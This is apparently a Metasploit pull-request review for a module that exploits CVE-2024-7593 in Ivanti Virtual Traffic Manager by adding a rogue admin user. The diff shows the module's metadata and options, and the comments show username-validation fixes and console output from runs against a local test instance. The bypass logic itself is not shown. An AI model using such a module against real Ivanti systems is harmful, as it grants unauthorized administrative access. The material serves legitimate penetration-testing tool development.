modules/auxiliary/admin/http/ivanti_vtm_admin.rb

```diff
@@ -0,0 +1,104 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)',
+        'Description' => %q{
+          This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new
+          administrative user to the web interface of the application.
+
+          Affected versions include 22.7R1, 22.6R1, 22.5R1, 22.3R2, 22.3, 22.2.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'ohnoisploited', # PoC
+          'mxalias' # Credited in the vendor advisory for the discovery, https://hackerone.com/mxalias?type=user
+        ],
+        'References' => [
+          ['PACKETSTORM', '179906'],
+          ['CVE', '2024-7593'],
+          ['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US']
+        ],
+        'DisclosureDate' => '2024-08-05',
+        'DefaultOptions' => {
+          'RPORT' => 9090,
+          'SSL' => 'True'
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username]),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
```

Comment:
In my testing I wasn't able to use the default username of `royce.cummerata` that was generated for me by this code. I would recommend verifying the username a bit more as it seems like periods in the username might cause errors. In my case I got this error:

`[-] Auxiliary aborted due to failure: unexpected-reply: Unexpected string found inside the title tag: 0`

Reply:
Tried to fix this by doing this code, don't know if this will help or not:

```ruby
 Faker::Internet.username.gsub('.', '')
```

Reply:
Running the module when the specified user already exists:
```
msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit
[*] Running module against 172.17.0.2

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 22.7R1
[-] Auxiliary aborted due to failure: bad-config: Specified user already exists. Specify a different user name with 'set NEW_USERNAME <USER>'.
[*] Auxiliary module execution completed
```

And when an invalid username is provided:
```
msf6 auxiliary(admin/http/ivanti_vtm_admin) > set NEW_USERNAME foo.bar
NEW_USERNAME => foo.bar
msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit 
[*] Running module against 172.17.0.2

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 22.7R1
[-] Auxiliary aborted due to failure: bad-config: Specified username is invalid. Username must contain only letters, numbers, underscores (_), and hyphens (-). Specify a different user name with 'set NEW_USERNAME <USER>'.
[*] Auxiliary module execution completed
```